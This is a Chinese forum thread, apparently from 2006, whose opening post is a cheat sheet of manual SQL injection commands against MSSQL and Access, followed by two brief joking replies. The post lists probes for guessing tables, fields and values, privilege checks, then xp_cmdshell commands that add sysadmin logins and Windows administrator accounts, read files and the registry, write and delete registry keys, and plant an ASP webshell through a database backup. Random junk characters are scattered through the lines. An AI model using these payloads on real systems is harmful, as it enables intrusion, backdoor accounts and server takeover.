社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3989阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 x1:Pj  
  2.初步判断是否是mssql ;and user>0 VyoE5o  
Qw<kX*fxrI  
  3.注入参数是字符'and [查询条件] and ''=' +# RlX3P  
oBj>9I;  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' NB+$ym  
!/4 V^H  
  5.判断数据库系统 rX!+@>4_L  
g/ l0}%  
  ;and (select count(*) from sysobjects)>0 mssql &=z1$ih>2\  
O~#uQm  
  ;and (select count(*) from msysobjects)>0 access ? gA=39[j  
*]m kyAhi  
ci ,o8 [Y  
u3M` 'YCb  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 y4/>Ol]  
N8 kb-2  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 i_0 ,BV C  
%on9C`/  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 9uw,-0*5  
!#c[~erNZ  
  9.(1)猜字段的ascii值(access) lbKv  
V5yxQb  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Q.9Ph ~  
]@/^_f>D  
  (2)猜字段的ascii值(mssql) ?Rt 1CDu  
x0u?*5-t  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 7~kpRa@\P  
4>$ ;gH  
  10.测试权限结构(mssql) Ej+]^t$\  
h\=p=M  
{ OxAY_  
JA?,0S  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Ez/\bE  
N &I8nZ9  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- S2'`|uI  
V#gF*]q  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 6bbZ<E5At  
,5eH2W  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- {DEzuU  
wR Xn9  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- BrNG%%n  
[+;FV!M6  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ?AV&@EX2C  
]cF1c90%  
  ;and 1=(select IS_MEMBER('db_owner'));-- hl6,#2$  
/<(*/P,>  
y:g7'+c  
P Pwxk;  
  11.添加mssql和系统的帐户 (30<oE{  
H _Zo@y~J  
  ;exec master.dbo.sp_addlogin username;-- 'a;ini  
  ;exec master.dbo.sp_password null,username,password;-- ( }]37  
W{fULl  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- zG-_!FIn  
Kk!6B  
  ;exec master.dbo.xp_cmdshell 'net user username password %rpR-}j  
/S7+B ]  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ]z-']R;  
%_B:EMPd  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- 9RG\UbX)^|  
N,j>;x3xT  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- !lQ#sL`  
Z?~gQ $  
[{S;%Jj*X/  
2Vz'n@g=  
  12.(1)遍历目录 M1AZ}b c0]  
:DZLjC  
  ;create table dirs(paths varchar(100), id int) @9OeC O  
xa87xX=a  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' o &BPG@n  
G$;>ueM  
  ;and (select top 1 paths from dirs)>0 g2g`,"T  
ps"/}u l  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) to99 _2  
sg3h i"Im  
w1wXTt  
KY4d+~2  
  (2)遍历目录 _MM   
u^`eKak"l  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Z |2E b*  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 &mh Ln4^  
'R^iKNPs  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 xGKfej9  
wrH7 pd  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 lZ}izl  
LQh^; ]^(  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 VDB$"T9#  
i Td-n9  
qTyg~]e9(  
f!5F]qP>-  
  13.mssql中的存储过程 Y.DwtfE  
iKg75%;t  
  xp_regenumvalues 注册表根键, 子键 "#*Nnt  
IYuyj(/!  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 &g*klt'B  
|.1qy,|!X  
  xp_regread 根键,子键,键值名 )r ULT$;i@  
$GQphXb$  
  ;exec xp_regread 0(wf{5  
fH-NU-"  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 j h; 9 [  
( FM4 ^#6  
  xp_regwrite 根键,子键, 值名, 值类型, 值 Hab!qWK`  
OZG0AX+=#  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 O[; +i  
QZ?d2PC=>?  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 S*4f%!  
Xa4GqV9M/-  
  xp_regdeletevalue 根键,子键,值名 FI\IY R  
'4$lL 6ly>  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 gzor%)C  
>OT \~C  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 S,lxM,DL&  
doLkrEm&  
smV!y8&  
dY1J<L}")  
  14.mssql的backup创建webshell hQJo ~'W=  
[u[ U_g*  
  use model /E)9v$!  
iDZrK%f l  
  create table cmd(str image); <lFdexH"T  
]x2Jpk99a  
  insert into cmd(str) values (''); 6A}eSG3  
d;{y`4p)s  
  backup database model to disk='c:\l.asp'; (/'h4KS@  
])C>\@c6Gm  
}xqXd%uz  
qB+n6y%  
  15.mssql内置函数 &(g|="T  
LaDY`u0G%  
  ;and (select @@version)>0 获得Windows的版本号 9J?W '8s5  
P2On k l  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa kg:l:C)Tq  
s,w YlVYf!  
  ;and (select user_name())>0 爆当前系统的连接用户 9GThyY  
0Su_#".-*  
  ;and (select db_name())>0 得到当前连接的数据库 N3Z iGD  
\4aKLr  
Y:wF5pp;  
Khj=llo,  
  16.简洁的webshell h77IWo6%  
)Lb72;!?  
  use model 8\DME  
@.k5MOn  
  create table cmd(str image); ^+M><jE9  
lDC}HC  
  insert into cmd(str) values (''); g&bwtEZ  
>=Jsv  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
10+5=?,请输入中文答案:十五